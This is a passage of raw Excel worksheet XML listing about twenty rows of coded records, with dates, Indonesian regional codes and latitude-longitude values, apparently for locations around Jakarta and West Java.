        <v>3213</v>
      </c>
      <c r="P1491">
        <v>32</v>
      </c>
      <c r="Q1491" t="s">
        <v>5178</v>
      </c>
      <c r="R1491" t="s">
        <v>5178</v>
      </c>
      <c r="S1491" t="s">
        <v>5179</v>
      </c>
      <c r="T1491" t="s">
        <v>42</v>
      </c>
      <c r="U1491" s="5">
        <v>10782044</v>
      </c>
      <c r="V1491" s="5" t="s">
        <v>15797</v>
      </c>
      <c r="W1491" s="5">
        <v>-628835</v>
      </c>
      <c r="X1491" t="s">
        <v>19564</v>
      </c>
      <c r="Y1491" t="str">
        <f t="shared" si="23"/>
        <v>-6.28835,107.82044</v>
      </c>
    </row>
    <row r="1492" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1492">
        <v>109016</v>
      </c>
      <c r="B1492" s="1">
        <v>43886</v>
      </c>
      <c r="C1492">
        <v>0</v>
      </c>
      <c r="D1492" t="s">
        <v>22</v>
      </c>
      <c r="E1492" t="s">
        <v>23</v>
      </c>
      <c r="F1492" t="s">
        <v>5180</v>
      </c>
      <c r="G1492" t="s">
        <v>5181</v>
      </c>
      <c r="H1492" t="s">
        <v>26</v>
      </c>
      <c r="I1492" t="s">
        <v>3481</v>
      </c>
      <c r="J1492" t="s">
        <v>5182</v>
      </c>
      <c r="M1492">
        <v>3173070002</v>
      </c>
      <c r="N1492">
        <v>3173070</v>
      </c>
      <c r="O1492">
        <v>3173</v>
      </c>
      <c r="P1492">
        <v>31</v>
      </c>
      <c r="Q1492" t="s">
        <v>2710</v>
      </c>
      <c r="R1492" t="s">
        <v>323</v>
      </c>
      <c r="S1492" t="s">
        <v>62</v>
      </c>
      <c r="T1492" t="s">
        <v>33</v>
      </c>
      <c r="U1492" s="5">
        <v>10683757</v>
      </c>
      <c r="V1492" s="5" t="s">
        <v>15798</v>
      </c>
      <c r="W1492" s="5">
        <v>-614586</v>
      </c>
      <c r="X1492" t="s">
        <v>19565</v>
      </c>
      <c r="Y1492" t="str">
        <f t="shared" si="23"/>
        <v>-6.14586,106.83757</v>
      </c>
    </row>
    <row r="1493" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1493">
        <v>109017</v>
      </c>
      <c r="B1493" s="1">
        <v>43886</v>
      </c>
      <c r="C1493">
        <v>0</v>
      </c>
      <c r="D1493" t="s">
        <v>22</v>
      </c>
      <c r="E1493" t="s">
        <v>23</v>
      </c>
      <c r="F1493" t="s">
        <v>5183</v>
      </c>
      <c r="G1493" t="s">
        <v>5184</v>
      </c>
      <c r="H1493" t="s">
        <v>26</v>
      </c>
      <c r="I1493" t="s">
        <v>1633</v>
      </c>
      <c r="J1493" t="s">
        <v>3135</v>
      </c>
      <c r="L1493" t="s">
        <v>5185</v>
      </c>
      <c r="M1493">
        <v>3671010001</v>
      </c>
      <c r="N1493">
        <v>3671010</v>
      </c>
      <c r="O1493">
        <v>3671</v>
      </c>
      <c r="P1493">
        <v>36</v>
      </c>
      <c r="Q1493" t="s">
        <v>4656</v>
      </c>
      <c r="R1493" t="s">
        <v>200</v>
      </c>
      <c r="S1493" t="s">
        <v>201</v>
      </c>
      <c r="T1493" t="s">
        <v>171</v>
      </c>
      <c r="U1493" s="5">
        <v>10668956</v>
      </c>
      <c r="V1493" s="5" t="s">
        <v>15799</v>
      </c>
      <c r="W1493" s="5">
        <v>-623731</v>
      </c>
      <c r="X1493" t="s">
        <v>19566</v>
      </c>
      <c r="Y1493" t="str">
        <f t="shared" si="23"/>
        <v>-6.23731,106.68956</v>
      </c>
    </row>
    <row r="1494" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1494">
        <v>109018</v>
      </c>
      <c r="B1494" s="1">
        <v>43886</v>
      </c>
      <c r="C1494">
        <v>0</v>
      </c>
      <c r="D1494" t="s">
        <v>22</v>
      </c>
      <c r="E1494" t="s">
        <v>23</v>
      </c>
      <c r="F1494" t="s">
        <v>5186</v>
      </c>
      <c r="G1494" t="s">
        <v>5187</v>
      </c>
      <c r="H1494" t="s">
        <v>26</v>
      </c>
      <c r="I1494" t="s">
        <v>5188</v>
      </c>
      <c r="J1494" t="s">
        <v>2777</v>
      </c>
      <c r="L1494" t="s">
        <v>5189</v>
      </c>
      <c r="M1494">
        <v>3171070002</v>
      </c>
      <c r="N1494">
        <v>3171070</v>
      </c>
      <c r="O1494">
        <v>3171</v>
      </c>
      <c r="P1494">
        <v>31</v>
      </c>
      <c r="Q1494" t="s">
        <v>2142</v>
      </c>
      <c r="R1494" t="s">
        <v>121</v>
      </c>
      <c r="S1494" t="s">
        <v>108</v>
      </c>
      <c r="T1494" t="s">
        <v>33</v>
      </c>
      <c r="U1494" s="5">
        <v>10682229</v>
      </c>
      <c r="V1494" s="5" t="s">
        <v>15800</v>
      </c>
      <c r="W1494" s="5">
        <v>-624876</v>
      </c>
      <c r="X1494" t="s">
        <v>19246</v>
      </c>
      <c r="Y1494" t="str">
        <f t="shared" si="23"/>
        <v>-6.24876,106.82229</v>
      </c>
    </row>
    <row r="1495" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1495">
        <v>109019</v>
      </c>
      <c r="B1495" s="1">
        <v>43886</v>
      </c>
      <c r="C1495">
        <v>0</v>
      </c>
      <c r="D1495" t="s">
        <v>22</v>
      </c>
      <c r="E1495" t="s">
        <v>23</v>
      </c>
      <c r="F1495" t="s">
        <v>5190</v>
      </c>
      <c r="H1495" t="s">
        <v>26</v>
      </c>
      <c r="I1495" t="s">
        <v>166</v>
      </c>
      <c r="J1495" t="s">
        <v>3636</v>
      </c>
      <c r="L1495" t="s">
        <v>5191</v>
      </c>
      <c r="M1495">
        <v>3172090005</v>
      </c>
      <c r="N1495">
        <v>3172090</v>
      </c>
      <c r="O1495">
        <v>3172</v>
      </c>
      <c r="P1495">
        <v>31</v>
      </c>
      <c r="Q1495" t="s">
        <v>2749</v>
      </c>
      <c r="R1495" t="s">
        <v>890</v>
      </c>
      <c r="S1495" t="s">
        <v>49</v>
      </c>
      <c r="T1495" t="s">
        <v>33</v>
      </c>
      <c r="U1495" s="5">
        <v>10688894</v>
      </c>
      <c r="V1495" s="5" t="s">
        <v>15801</v>
      </c>
      <c r="W1495" s="5">
        <v>-619604</v>
      </c>
      <c r="X1495" t="s">
        <v>19567</v>
      </c>
      <c r="Y1495" t="str">
        <f t="shared" si="23"/>
        <v>-6.19604,106.88894</v>
      </c>
    </row>
    <row r="1496" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1496">
        <v>109021</v>
      </c>
      <c r="B1496" s="1">
        <v>43886</v>
      </c>
      <c r="C1496">
        <v>0</v>
      </c>
      <c r="D1496" t="s">
        <v>22</v>
      </c>
      <c r="E1496" t="s">
        <v>23</v>
      </c>
      <c r="F1496" t="s">
        <v>5192</v>
      </c>
      <c r="H1496" t="s">
        <v>26</v>
      </c>
      <c r="I1496" t="s">
        <v>1359</v>
      </c>
      <c r="J1496" t="s">
        <v>2627</v>
      </c>
      <c r="L1496" t="s">
        <v>5193</v>
      </c>
      <c r="M1496">
        <v>3216081009</v>
      </c>
      <c r="N1496">
        <v>3216081</v>
      </c>
      <c r="O1496">
        <v>3216</v>
      </c>
      <c r="P1496">
        <v>32</v>
      </c>
      <c r="Q1496" t="s">
        <v>4111</v>
      </c>
      <c r="R1496" t="s">
        <v>2512</v>
      </c>
      <c r="S1496" t="s">
        <v>41</v>
      </c>
      <c r="T1496" t="s">
        <v>42</v>
      </c>
      <c r="U1496" s="5">
        <v>10706039</v>
      </c>
      <c r="V1496" s="5" t="s">
        <v>15802</v>
      </c>
      <c r="W1496" s="5">
        <v>-622375</v>
      </c>
      <c r="X1496" t="s">
        <v>19568</v>
      </c>
      <c r="Y1496" t="str">
        <f t="shared" si="23"/>
        <v>-6.22375,107.06039</v>
      </c>
    </row>
    <row r="1497" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1497">
        <v>109022</v>
      </c>
      <c r="B1497" s="1">
        <v>43886</v>
      </c>
      <c r="C1497">
        <v>0</v>
      </c>
      <c r="D1497" t="s">
        <v>22</v>
      </c>
      <c r="E1497" t="s">
        <v>23</v>
      </c>
      <c r="F1497" t="s">
        <v>5194</v>
      </c>
      <c r="G1497" t="s">
        <v>5195</v>
      </c>
      <c r="H1497" t="s">
        <v>26</v>
      </c>
      <c r="I1497" t="s">
        <v>5196</v>
      </c>
      <c r="J1497" t="s">
        <v>5197</v>
      </c>
      <c r="L1497" t="s">
        <v>5198</v>
      </c>
      <c r="M1497">
        <v>3174040002</v>
      </c>
      <c r="N1497">
        <v>3174040</v>
      </c>
      <c r="O1497">
        <v>3174</v>
      </c>
      <c r="P1497">
        <v>31</v>
      </c>
      <c r="Q1497" t="s">
        <v>2605</v>
      </c>
      <c r="R1497" t="s">
        <v>377</v>
      </c>
      <c r="S1497" t="s">
        <v>32</v>
      </c>
      <c r="T1497" t="s">
        <v>33</v>
      </c>
      <c r="U1497" s="5">
        <v>10679207</v>
      </c>
      <c r="V1497" s="5" t="s">
        <v>15803</v>
      </c>
      <c r="W1497" s="5">
        <v>-618352</v>
      </c>
      <c r="X1497" t="s">
        <v>19569</v>
      </c>
      <c r="Y1497" t="str">
        <f t="shared" si="23"/>
        <v>-6.18352,106.79207</v>
      </c>
    </row>
    <row r="1498" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1498">
        <v>109023</v>
      </c>
      <c r="B1498" s="1">
        <v>43886</v>
      </c>
      <c r="C1498">
        <v>0</v>
      </c>
      <c r="D1498" t="s">
        <v>22</v>
      </c>
      <c r="E1498" t="s">
        <v>23</v>
      </c>
      <c r="F1498" t="s">
        <v>5199</v>
      </c>
      <c r="G1498" t="s">
        <v>5200</v>
      </c>
      <c r="H1498" t="s">
        <v>26</v>
      </c>
      <c r="I1498" t="s">
        <v>197</v>
      </c>
      <c r="J1498" t="s">
        <v>2627</v>
      </c>
      <c r="L1498" t="s">
        <v>5201</v>
      </c>
      <c r="M1498">
        <v>3275050001</v>
      </c>
      <c r="N1498">
        <v>3275050</v>
      </c>
      <c r="O1498">
        <v>3275</v>
      </c>
      <c r="P1498">
        <v>32</v>
      </c>
      <c r="Q1498" t="s">
        <v>4376</v>
      </c>
      <c r="R1498" t="s">
        <v>955</v>
      </c>
      <c r="S1498" t="s">
        <v>41</v>
      </c>
      <c r="T1498" t="s">
        <v>42</v>
      </c>
      <c r="U1498" s="5">
        <v>10696398</v>
      </c>
      <c r="V1498" s="5" t="s">
        <v>15804</v>
      </c>
      <c r="W1498" s="5">
        <v>-627625</v>
      </c>
      <c r="X1498" t="s">
        <v>19570</v>
      </c>
      <c r="Y1498" t="str">
        <f t="shared" si="23"/>
        <v>-6.27625,106.96398</v>
      </c>
    </row>
    <row r="1499" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1499">
        <v>109024</v>
      </c>
      <c r="B1499" s="1">
        <v>43886</v>
      </c>
      <c r="C1499">
        <v>0</v>
      </c>
      <c r="D1499" t="s">
        <v>22</v>
      </c>
      <c r="E1499" t="s">
        <v>23</v>
      </c>
      <c r="F1499" t="s">
        <v>5202</v>
      </c>
      <c r="G1499" t="s">
        <v>5203</v>
      </c>
      <c r="H1499" t="s">
        <v>26</v>
      </c>
      <c r="I1499" t="s">
        <v>2165</v>
      </c>
      <c r="J1499" t="s">
        <v>2627</v>
      </c>
      <c r="M1499">
        <v>3216100006</v>
      </c>
      <c r="N1499">
        <v>3216100</v>
      </c>
      <c r="O1499">
        <v>3216</v>
      </c>
      <c r="P1499">
        <v>32</v>
      </c>
      <c r="Q1499" t="s">
        <v>939</v>
      </c>
      <c r="R1499" t="s">
        <v>940</v>
      </c>
      <c r="S1499" t="s">
        <v>41</v>
      </c>
      <c r="T1499" t="s">
        <v>42</v>
      </c>
      <c r="U1499" s="5">
        <v>10699439</v>
      </c>
      <c r="V1499" s="5" t="s">
        <v>15805</v>
      </c>
      <c r="W1499" s="5">
        <v>-611664</v>
      </c>
      <c r="X1499" t="s">
        <v>19571</v>
      </c>
      <c r="Y1499" t="str">
        <f t="shared" si="23"/>
        <v>-6.11664,106.99439</v>
      </c>
    </row>
    <row r="1500" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1500">
        <v>109025</v>
      </c>
      <c r="B1500" s="1">
        <v>43886</v>
      </c>
      <c r="C1500">
        <v>0</v>
      </c>
      <c r="D1500" t="s">
        <v>22</v>
      </c>
      <c r="E1500" t="s">
        <v>23</v>
      </c>
      <c r="F1500" t="s">
        <v>5204</v>
      </c>
      <c r="G1500" t="s">
        <v>5205</v>
      </c>
      <c r="H1500" t="s">
        <v>26</v>
      </c>
      <c r="I1500" t="s">
        <v>4619</v>
      </c>
      <c r="J1500" t="s">
        <v>5206</v>
      </c>
      <c r="L1500" t="s">
        <v>5207</v>
      </c>
      <c r="M1500">
        <v>3172100002</v>
      </c>
      <c r="N1500">
        <v>3172100</v>
      </c>
      <c r="O1500">
        <v>3172</v>
      </c>
      <c r="P1500">
        <v>31</v>
      </c>
      <c r="Q1500" t="s">
        <v>3168</v>
      </c>
      <c r="R1500" t="s">
        <v>1436</v>
      </c>
      <c r="S1500" t="s">
        <v>49</v>
      </c>
      <c r="T1500" t="s">
        <v>33</v>
      </c>
      <c r="U1500" s="5">
        <v>10685620</v>
      </c>
      <c r="V1500" s="5" t="s">
        <v>15806</v>
      </c>
      <c r="W1500" s="5">
        <v>-620009</v>
      </c>
      <c r="X1500" t="s">
        <v>19572</v>
      </c>
      <c r="Y1500" t="str">
        <f t="shared" si="23"/>
        <v>-6.20009,106.85620</v>
      </c>
    </row>
    <row r="1501" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1501">
        <v>109026</v>
      </c>
      <c r="B1501" s="1">
        <v>43886</v>
      </c>
      <c r="C1501">
        <v>0</v>
      </c>
      <c r="D1501" t="s">
        <v>22</v>
      </c>
      <c r="E1501" t="s">
        <v>23</v>
      </c>
      <c r="F1501" t="s">
        <v>5208</v>
      </c>
      <c r="G1501" t="s">
        <v>5209</v>
      </c>
      <c r="H1501" t="s">
        <v>26</v>
      </c>
      <c r="I1501" t="s">
        <v>3024</v>
      </c>
      <c r="J1501" t="s">
        <v>5210</v>
      </c>
      <c r="L1501" t="s">
        <v>5211</v>
      </c>
      <c r="M1501">
        <v>3175010005</v>
      </c>
      <c r="N1501">
        <v>3175010</v>
      </c>
      <c r="O1501">
        <v>3175</v>
      </c>
      <c r="P1501">
        <v>31</v>
      </c>
      <c r="Q1501" t="s">
        <v>1686</v>
      </c>
      <c r="R1501" t="s">
        <v>546</v>
      </c>
      <c r="S1501" t="s">
        <v>547</v>
      </c>
      <c r="T1501" t="s">
        <v>33</v>
      </c>
      <c r="U1501" s="5">
        <v>10677904</v>
      </c>
      <c r="V1501" s="5" t="s">
        <v>14567</v>
      </c>
      <c r="W1501" s="5">
        <v>-611273</v>
      </c>
      <c r="X1501" t="s">
        <v>19573</v>
      </c>
      <c r="Y1501" t="str">
        <f t="shared" si="23"/>
        <v>-6.11273,106.77904</v>
      </c>
    </row>
    <row r="1502" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1502">
        <v>109027</v>
      </c>
      <c r="B1502" s="1">
        <v>43886</v>
      </c>
      <c r="C1502">
        <v>0</v>
      </c>
      <c r="D1502" t="s">
        <v>22</v>
      </c>
      <c r="E1502" t="s">
        <v>23</v>
      </c>
      <c r="F1502" t="s">
        <v>5212</v>
      </c>
      <c r="G1502" t="s">
        <v>5213</v>
      </c>
      <c r="H1502" t="s">
        <v>26</v>
      </c>
      <c r="I1502" t="s">
        <v>753</v>
      </c>
      <c r="J1502" t="s">
        <v>2268</v>
      </c>
      <c r="L1502" t="s">
        <v>5214</v>
      </c>
      <c r="M1502">
        <v>3175030002</v>
      </c>
      <c r="N1502">
        <v>3175030</v>
      </c>
      <c r="O1502">
        <v>3175</v>
      </c>
      <c r="P1502">
        <v>31</v>
      </c>
      <c r="Q1502" t="s">
        <v>1592</v>
      </c>
      <c r="R1502" t="s">
        <v>1563</v>
      </c>
      <c r="S1502" t="s">
        <v>547</v>
      </c>
      <c r="T1502" t="s">
        <v>33</v>
      </c>
      <c r="U1502" s="5">
        <v>10686202</v>
      </c>
      <c r="V1502" s="5" t="s">
        <v>15277</v>
      </c>
      <c r="W1502" s="5">
        <v>-615343</v>
      </c>
      <c r="X1502" t="s">
        <v>19574</v>
      </c>
      <c r="Y1502" t="str">
        <f t="shared" si="23"/>
        <v>-6.15343,106.86202</v>
      </c>
    </row>
    <row r="1503" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1503">
        <v>109028</v>
      </c>
      <c r="B1503" s="1">
        <v>43886</v>
      </c>
      <c r="C1503">
        <v>0</v>
      </c>
      <c r="D1503" t="s">
        <v>22</v>
      </c>
      <c r="E1503" t="s">
        <v>23</v>
      </c>
      <c r="F1503" t="s">
        <v>5215</v>
      </c>
      <c r="G1503" t="s">
        <v>5216</v>
      </c>
      <c r="H1503" t="s">
        <v>26</v>
      </c>
      <c r="I1503" t="s">
        <v>1447</v>
      </c>
      <c r="J1503" t="s">
        <v>5217</v>
      </c>
      <c r="L1503" t="s">
        <v>5218</v>
      </c>
      <c r="M1503">
        <v>3172100005</v>
      </c>
      <c r="N1503">
        <v>3172100</v>
      </c>
      <c r="O1503">
        <v>3172</v>
      </c>
      <c r="P1503">
        <v>31</v>
      </c>
      <c r="Q1503" t="s">
        <v>1773</v>
      </c>
      <c r="R1503" t="s">
        <v>1436</v>
      </c>
      <c r="S1503" t="s">
        <v>49</v>
      </c>
      <c r="T1503" t="s">
        <v>33</v>
      </c>
      <c r="U1503" s="5">
        <v>10686466</v>
      </c>
      <c r="V1503" s="5" t="s">
        <v>15807</v>
      </c>
      <c r="W1503" s="5">
        <v>-619959</v>
      </c>
      <c r="X1503" t="s">
        <v>19575</v>
      </c>
      <c r="Y1503" t="str">
        <f t="shared" si="23"/>
        <v>-6.19959,106.86466</v>
      </c>
    </row>
    <row r="1504" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1504">
        <v>109029</v>
      </c>
      <c r="B1504" s="1">
        <v>43886</v>
      </c>
      <c r="C1504">
        <v>0</v>
      </c>
      <c r="D1504" t="s">
        <v>22</v>
      </c>
      <c r="E1504" t="s">
        <v>23</v>
      </c>
      <c r="F1504" t="s">
        <v>5219</v>
      </c>
      <c r="G1504" t="s">
        <v>5220</v>
      </c>
      <c r="H1504" t="s">
        <v>26</v>
      </c>
      <c r="I1504" t="s">
        <v>1633</v>
      </c>
      <c r="J1504" t="s">
        <v>5221</v>
      </c>
      <c r="M1504">
        <v>3172060002</v>
      </c>
      <c r="N1504">
        <v>3172060</v>
      </c>
      <c r="O1504">
        <v>3172</v>
      </c>
      <c r="P1504">
        <v>31</v>
      </c>
      <c r="Q1504" t="s">
        <v>1025</v>
      </c>
      <c r="R1504" t="s">
        <v>48</v>
      </c>
      <c r="S1504" t="s">
        <v>49</v>
      </c>
      <c r="T1504" t="s">
        <v>33</v>
      </c>
      <c r="U1504" s="5">
        <v>10687214</v>
      </c>
      <c r="V1504" s="5" t="s">
        <v>15808</v>
      </c>
      <c r="W1504" s="5">
        <v>-623297</v>
      </c>
      <c r="X1504" t="s">
        <v>19576</v>
      </c>
      <c r="Y1504" t="str">
        <f t="shared" si="23"/>
        <v>-6.23297,106.87214</v>
      </c>
    </row>
    <row r="1505" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1505">
        <v>109030</v>
      </c>
      <c r="B1505" s="1">
        <v>43886</v>
      </c>
      <c r="C1505">
        <v>0</v>
      </c>
      <c r="D1505" t="s">
        <v>22</v>
      </c>
      <c r="E1505" t="s">
        <v>23</v>
      </c>
      <c r="F1505" t="s">
        <v>5222</v>
      </c>
      <c r="G1505" t="s">
        <v>5223</v>
      </c>
      <c r="H1505" t="s">
        <v>26</v>
      </c>
      <c r="I1505" t="s">
        <v>5224</v>
      </c>
      <c r="J1505" t="s">
        <v>1022</v>
      </c>
      <c r="L1505" t="s">
        <v>5225</v>
      </c>
      <c r="M1505">
        <v>3172060002</v>
      </c>
      <c r="N1505">
        <v>3172060</v>
      </c>
      <c r="O1505">
        <v>3172</v>
      </c>
      <c r="P1505">
        <v>31</v>
      </c>
      <c r="Q1505" t="s">
        <v>1025</v>
      </c>
      <c r="R1505" t="s">
        <v>48</v>
      </c>
      <c r="S1505" t="s">
        <v>49</v>
      </c>
      <c r="T1505" t="s">
        <v>33</v>
      </c>
      <c r="U1505" s="5">
        <v>10687598</v>
      </c>
      <c r="V1505" s="5" t="s">
        <v>15171</v>
      </c>
      <c r="W1505" s="5">
        <v>-624437</v>
      </c>
      <c r="X1505" t="s">
        <v>19577</v>
      </c>
      <c r="Y1505" t="str">
        <f t="shared" si="23"/>
        <v>-6.24437,106.87598</v>
      </c>
    </row>
    <row r="1506" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1506">
        <v>109031</v>
      </c>
      <c r="B1506" s="1">
        <v>43886</v>
      </c>
      <c r="C1506">
        <v>0</v>
      </c>
      <c r="D1506" t="s">
        <v>22</v>
      </c>
      <c r="E1506" t="s">
        <v>23</v>
      </c>
      <c r="F1506" t="s">
        <v>5226</v>
      </c>
      <c r="G1506" t="s">
        <v>5227</v>
      </c>
      <c r="H1506" t="s">
        <v>26</v>
      </c>
      <c r="I1506" t="s">
        <v>27</v>
      </c>
      <c r="J1506" t="s">
        <v>2627</v>
      </c>
      <c r="M1506">
        <v>3275061004</v>
      </c>
      <c r="N1506">
        <v>3275061</v>
      </c>
      <c r="O1506">
        <v>3275</v>
      </c>
      <c r="P1506">
        <v>32</v>
      </c>
      <c r="Q1506" t="s">
        <v>39</v>
      </c>
      <c r="R1506" t="s">
        <v>40</v>
      </c>
      <c r="S1506" t="s">
        <v>41</v>
      </c>
      <c r="T1506" t="s">
        <v>42</v>
      </c>
      <c r="U1506" s="5">
        <v>10699474</v>
      </c>
      <c r="V1506" s="5" t="s">
        <v>15809</v>
      </c>
      <c r="W1506" s="5">
        <v>-618285</v>
      </c>
      <c r="X1506" t="s">
        <v>19578</v>
      </c>
      <c r="Y1506" t="str">
        <f t="shared" si="23"/>
        <v>-6.18285,106.99474</v>
      </c>
    </row>
    <row r="1507" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1507">
        <v>109032</v>
      </c>
      <c r="B1507" s="1">
        <v>43886</v>
      </c>
      <c r="C1507">
        <v>0</v>
      </c>
      <c r="D1507" t="s">
        <v>22</v>
      </c>
      <c r="E1507" t="s">
        <v>23</v>
      </c>
      <c r="F1507" t="s">
        <v>5228</v>
      </c>
      <c r="G1507" t="s">
        <v>5229</v>
      </c>
      <c r="H1507" t="s">
        <v>26</v>
      </c>
      <c r="I1507" t="s">
        <v>893</v>
      </c>
      <c r="J1507" t="s">
        <v>1711</v>
      </c>
      <c r="L1507" t="s">
        <v>5230</v>
      </c>
      <c r="M1507">
        <v>3175050001</v>
      </c>
      <c r="N1507">
        <v>3175050</v>
      </c>
      <c r="O1507">
        <v>3175</v>
      </c>
      <c r="P1507">
        <v>31</v>
      </c>
      <c r="Q1507" t="s">
        <v>1037</v>
      </c>
      <c r="R1507" t="s">
        <v>1013</v>
      </c>
      <c r="S1507" t="s">
        <v>547</v>
      </c>
      <c r="T1507" t="s">
        <v>33</v>
      </c>
      <c r="U1507" s="5">
        <v>10690650</v>
      </c>
      <c r="V1507" s="5" t="s">
        <v>15810</v>
      </c>
      <c r="W1507" s="5">
        <v>-614579</v>
      </c>
      <c r="X1507" t="s">
        <v>19579</v>
      </c>
      <c r="Y1507" t="str">
        <f t="shared" si="23"/>
        <v>-6.14579,106.90650</v>
      </c>
    </row>
    <row r="1508" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1508">
        <v>109033</v>
      </c>
      <c r="B1508" s="1">
        <v>43886</v>
      </c>
      <c r="C1508">
        <v>0</v>
      </c>
      <c r="D1508" t="s">
        <v>22</v>
      </c>
      <c r="E1508" t="s">
        <v>23</v>
      </c>
      <c r="F1508" t="s">
        <v>5231</v>
      </c>
      <c r="G1508" t="s">
        <v>5232</v>
      </c>
      <c r="H1508" t="s">
        <v>26</v>
      </c>
      <c r="I1508" t="s">
        <v>2962</v>
      </c>
      <c r="J1508" t="s">
        <v>2599</v>
      </c>
      <c r="L1508" t="s">
        <v>5233</v>
      </c>
      <c r="M1508">
        <v>3174030004</v>
      </c>
      <c r="N1508">
        <v>3174030</v>
      </c>
      <c r="O1508">
        <v>3174</v>
      </c>
      <c r="P1508">
        <v>31</v>
      </c>
      <c r="Q1508" t="s">
        <v>2601</v>
      </c>
      <c r="R1508" t="s">
        <v>1487</v>
      </c>
      <c r="S1508" t="s">
        <v>32</v>
      </c>
      <c r="T1508" t="s">
        <v>33</v>
      </c>
      <c r="U1508" s="5">
        <v>10679867</v>
      </c>
      <c r="V1508" s="5" t="s">
        <v>15811</v>
      </c>
      <c r="W1508" s="5">
        <v>-618196</v>
      </c>
      <c r="X1508" t="s">
        <v>19580</v>
      </c>
      <c r="Y1508" t="str">
        <f t="shared" si="23"/>
        <v>-6.18196,106.79867</v>
      </c>
    </row>
    <row r="1509" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1509">
        <v>109034</v>
      </c>
      <c r="B1509" s="1">
        <v>43886</v>
      </c>
      <c r="C1509">
        <v>0</v>
      </c>
      <c r="D1509" t="s">
        <v>22</v>
      </c>
      <c r="E1509" t="s">
        <v>23</v>
      </c>
      <c r="F1509" t="s">
        <v>5234</v>
      </c>
      <c r="G1509" t="s">
        <v>5235</v>
      </c>
      <c r="H1509" t="s">
        <v>26</v>
      </c>
      <c r="I1509" t="s">
        <v>166</v>
      </c>
      <c r="J1509" t="s">
        <v>45</v>
      </c>
      <c r="M1509">
        <v>3172060004</v>
      </c>
      <c r="N1509">
        <v>3172060</v>
      </c>
      <c r="O1509">
        <v>3172</v>
      </c>
      <c r="P1509">
        <v>31</v>
      </c>
      <c r="Q1509" t="s">
        <v>47</v>
      </c>
      <c r="R1509" t="s">
        <v>48</v>
      </c>
      <c r="S1509" t="s">
        <v>49</v>
      </c>
      <c r="T1509" t="s">
        <v>33</v>
      </c>
      <c r="U1509" s="5">
        <v>10688881</v>
      </c>
      <c r="V1509" s="5" t="s">
        <v>15812</v>
      </c>
      <c r="W1509" s="5">
        <v>-623501</v>
      </c>
      <c r="X1509" t="s">
        <v>19581</v>
      </c>
      <c r="Y1509" t="str">
        <f t="shared" si="23"/>
        <v>-6.23501,106.88881</v>
      </c>
    </row>
    <row r="1510" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1510">
        <v>109035</v>
      </c>
      <c r="B1510" s="1">
        <v>43886</v>
      </c>
      <c r="C1510">
        <v>0</v>
      </c>
      <c r="D1510" t="s">
        <v>22</v>
      </c>
      <c r="E1510" t="s">
        <v>23</v>
      </c>
      <c r="F1510" t="s">
        <v>5236</v>
      </c>
      <c r="G1510" t="s">
        <v>5237</v>
      </c>
      <c r="H1510" t="s">
        <v>26</v>
      </c>
      <c r="I1510" t="s">
        <v>592</v>
      </c>
      <c r="J1510" t="s">
        <v>2627</v>
      </c>
      <c r="M1510">
        <v>3275070003</v>
      </c>
      <c r="N1510">
        <v>3275070</v>
      </c>
      <c r="O1510">
        <v>3275</v>
      </c>
      <c r="P1510">
        <v>32</v>
      </c>
      <c r="Q1510" t="s">
        <v>5238</v>
      </c>
      <c r="R1510" t="s">
        <v>3310</v>
      </c>
      <c r="S1510" t="s">
        <v>41</v>
      </c>
      <c r="T1510" t="s">
        <v>42</v>
      </c>
      <c r="U1510" s="5">
        <v>10701056</v>
      </c>
      <c r="V1510" s="5" t="s">
        <v>15813</v>
      </c>
      <c r="W1510" s="5">
        <v>-620768</v>
      </c>
      <c r="X1510" t="s">
        <v>19582</v>
      </c>
      <c r="Y1510" t="str">
        <f t="shared" si="23"/>
        <v>-6.20768,107.01056</v>
      </c>
    </row>
    <row r="1511" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1511">
        <v>109036</v>
      </c>
      <c r="B1511" s="1">
        <v>43886</v>
      </c>
      <c r="C1511">
        <v>0</v>
      </c>
      <c r="D1511" t="s">
        <v>22</v>
      </c>
      <c r="E1511" t="s">
        <v>23</v>
      </c>
      <c r="F1511" t="s">
        <v>5239</v>
      </c>
      <c r="G1511" t="s">
        <v>5240</v>
      </c>
      <c r="H1511" t="s">
        <v>26</v>
      </c>
      <c r="I1511" t="s">
        <v>1009</v>
      </c>
      <c r="J1511" t="s">
        <v>5241</v>
      </c>
      <c r="L1511" t="s">
        <v>5242</v>
      </c>
      <c r="M1511">
        <v>3174050007</v>
      </c>
      <c r="N1511">
        <v>3174050</v>
      </c>
      <c r="O1511">
        <v>3174</v>
      </c>
      <c r="P1511">
        <v>31</v>
      </c>
      <c r="Q1511" t="s">
        <v>5243</v>
      </c>
      <c r="R1511" t="s">
        <v>2826</v>
      </c>
      <c r="S1511" t="s">
        <v>32</v>
      </c>
      <c r="T1511" t="s">
        <v>33</v>
      </c>
      <c r="U1511" s="5">
        <v>10679638</v>
      </c>
      <c r="V1511" s="5" t="s">
        <v>15814</v>
      </c>
      <c r="W1511" s="5">
        <v>-614894</v>
      </c>
      <c r="X1511" t="s">
        <v>19583</v>
      </c>
      <c r="Y1511" t="str">
        <f t="shared" si="23"/>
        <v>-6.14894,106.79638</v>
      </c>
    </row>
    <row r="1512" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1512">
        <v>109037</v>
      </c>
      <c r="B1512" s="1">
        <v>43886</v>
      </c>
      <c r="C1512">
        <v>0</v>
      </c>
      <c r="D1512" t="s">
        <v>22</v>
      </c>
      <c r="E1512" t="s">
        <v>23</v>
      </c>
      <c r="F1512" t="s">
        <v>5244</v>
      </c>
      <c r="G1512" t="s">
        <v>5245</v>
